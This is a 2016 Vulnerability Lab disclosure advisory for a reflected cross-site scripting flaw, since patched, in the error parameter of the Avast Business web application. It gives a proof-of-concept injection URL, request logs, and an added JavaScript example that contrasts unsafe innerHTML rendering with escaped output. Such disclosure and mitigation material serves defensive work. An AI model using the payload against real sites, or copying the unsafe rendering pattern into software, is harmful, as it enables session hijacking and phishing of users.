Document Title:
===============
AVAST Business #14 - Client Side Cross Site Vulnerability

Date:
=====
2016-05-22

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1624

VL-ID:
=====
1624

Common Vulnerability Scoring System:
====================================
3.3

Introduction:
=============
Avast security software products are developed for Microsoft Windows, Mac OS X, Android and Linux users by AVAST Software s.r.o., a Czech private limited company. Avast was founded in 1988, and is headquartered in Prague, Czech Republic. It produces antivirus and security programs for personal and commercial use. In January 2015, Avast had 21.4% of the worldwide security vendor market share. As of March 2015, Avast had 233 million users of its products and services worldwide. According to a company press release, Avast protects more than 30 percent of the consumer PCs in the world outside of China. The software products have a user interface available in 45 languages. Avast has 500 employees; 90 percent of whom work in the Czech Republic. Avast has 13 offices in Prague, Brno, Germany, China, South Korea, Taiwan & U.S.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Avast_%28software_company%29 )

Abstract:
=========
An independent vulnerability laboratory researcher discovered a client-side cross site scripting web vulnerability in the official Avast Business online service web-application.

Report-Timeline:
================
2015-10-27: Researcher Notification & Coordination (Kieran Claessens)
2015-10-27: Vendor Notification (AVAST Security Team - Bug Bounty Program)
2015-11-02: Vendor Response/Feedback (AVAST Security Team - Bug Bounty Program)
2015-11-24: Vendor Fix/Patch (AVAST Developer Team)
2016-05-23: Public Disclosure (Vulnerability Laboratory)

Status:
========
Published

Affected Products:
==================
AVAST!
Product: Business - Online Service (Web-Application) v2015 Q4

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
A client-side cross site scripting web vulnerability has been discovered in the official Avast Business online service web-application. The client-side vulnerability allows a remote attacker to inject script code into client-side browser-to-application requests.

The vulnerability is located in the `error` parameter of the exception handling in the Avast Business online-service web-application. Remote attackers are able to inject script code to manipulate client-side GET method requests to the Avast Business website. The injection point is the error value of the exception, and the execution of the injected script code occurs in the error message context. The attack vector of the vulnerability is client-side and the request method to inject or execute is GET.

The security risk of the client-side cross site web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.3. Exploitation of the client-side cross site scripting web vulnerability requires no privileged web application user account and low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent load of malicious script code or client-side manipulation of affected or connected modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] Avast - Business

Vulnerable Parameter(s):
[+] #error

Affected Module(s):
[+] Error - Exception Handling (Web-Server)

Proof of Concept:
=================
The client-side cross site vulnerability can be exploited by remote attackers without a privileged web-application user account and with low or medium user interaction. For security demonstration or to reproduce the vulnerability, follow the provided information and steps below.
Link (Intercepted):
https://support.business.avast.com/access/jwt?jwt=<intercepted JWT token removed from this copy>

Link (Error Redirect):
https://business.avast.com/public/#error/911/Invalid%20iat%20parameter.%20The%20supplied%20iat%20value%20is%20more%20than%203%20minutes%20off,%20check%20your%20server%20clock.
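As an added illustration (not part of the advisory and not Avast's code), the following shows why a hash-routed error page such as the redirect above, `#error/<code>/<message>`, becomes a DOM XSS sink when the decoded message is written with innerHTML, next to the encoded rendering that fixes it. The route format, the function names and the sample inputs are assumptions constructed for this example.

```javascript
// Added example (hypothetical code, not Avast's): parsing a
// "#error/<code>/<percent-encoded message>" fragment and rendering it
// unsafely versus safely. Route grammar and names are assumptions.

// Parse the fragment from a location.hash-style value. Returns null when the
// fragment is not an error route or its percent-encoding is malformed.
function parseErrorRoute(hash) {
  const m = /^#error\/(\d+)\/(.*)$/.exec(hash);
  if (!m) return null;
  let message;
  try {
    message = decodeURIComponent(m[2]);
  } catch (e) {
    return null; // URIError on bad %-sequences: treat as no route
  }
  return { code: m[1], message };
}

// Vulnerable pattern: the decoded message is interpolated into markup that the
// page then assigns to innerHTML, so a " or > in the fragment closes the
// intended attribute/element and attacker-controlled markup is parsed.
function renderErrorUnsafe(route) {
  return `<div class="error" data-code="${route.code}">${route.message}</div>`;
}

// Mitigation: HTML-encode every context-changing character before the string
// reaches innerHTML (or, in a real browser, use el.textContent instead).
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

function renderErrorSafe(route) {
  const code = escapeHtml(route.code);
  const msg = escapeHtml(route.message);
  return `<div class="error" data-code="${code}">${msg}</div>`;
}

// Constructed inputs: the legitimate redirect from the advisory and a fragment
// carrying the advisory's PoC value (letsxssthis">).
const LEGIT = "#error/911/Invalid%20iat%20parameter.%20The%20supplied%20iat%20value%20is%20more%20than%203%20minutes%20off,%20check%20your%20server%20clock.";
const POC = '#error/911/letsxssthis">';
```

With the PoC fragment, `renderErrorUnsafe` passes `letsxssthis">` through untouched while `renderErrorSafe` emits `letsxssthis&quot;&gt;`, which the browser displays as text.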
Link PoC:
https://business.avast.com/public/#error/911/letsxssthis">

--- PoC Session Logs [GET] ---
Status: 200[OK]
GET https://business.avast.com/public/K
Load Flags[LOAD_NORMAL] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[business.avast.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://business.avast.com/public/]
Cookie[_ga=GA1.3.1707638216.1445943077; _gat_UA-58120669-2=1]
Connection[keep-alive]
Response Header:
Server[nginx/1.6.2]
Date[Tue, 27 Oct 2015 10:53:31 GMT]
Content-Type[text/html]
Transfer-Encoding[chunked]
Connection[keep-alive]
X-Frame-Options[SAMEORIGIN]
x-content-type-options[nosniff]
Strict-Transport-Security[max-age=31536000; includeSubdomains;]
X-XSS-Protection[1; mode=block]
Content-Encoding[gzip]

Reference(s):
https://business.avast.com/
https://business.avast.com/public/
https://business.avast.com/public/#error/

Risk:
=====
The security risk of the client-side cross site scripting web vulnerability in the Avast Business web-application is estimated as medium. (CVSS 3.3)

Credits:
========
Kieran Claessens - [http://www.vulnerability-lab.com/show.php?user=Kieran%20Claessens]

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages.
Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section:    magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social:     twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material, contact (admin@ or research@vulnerability-lab.com) to ask for permission.

Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™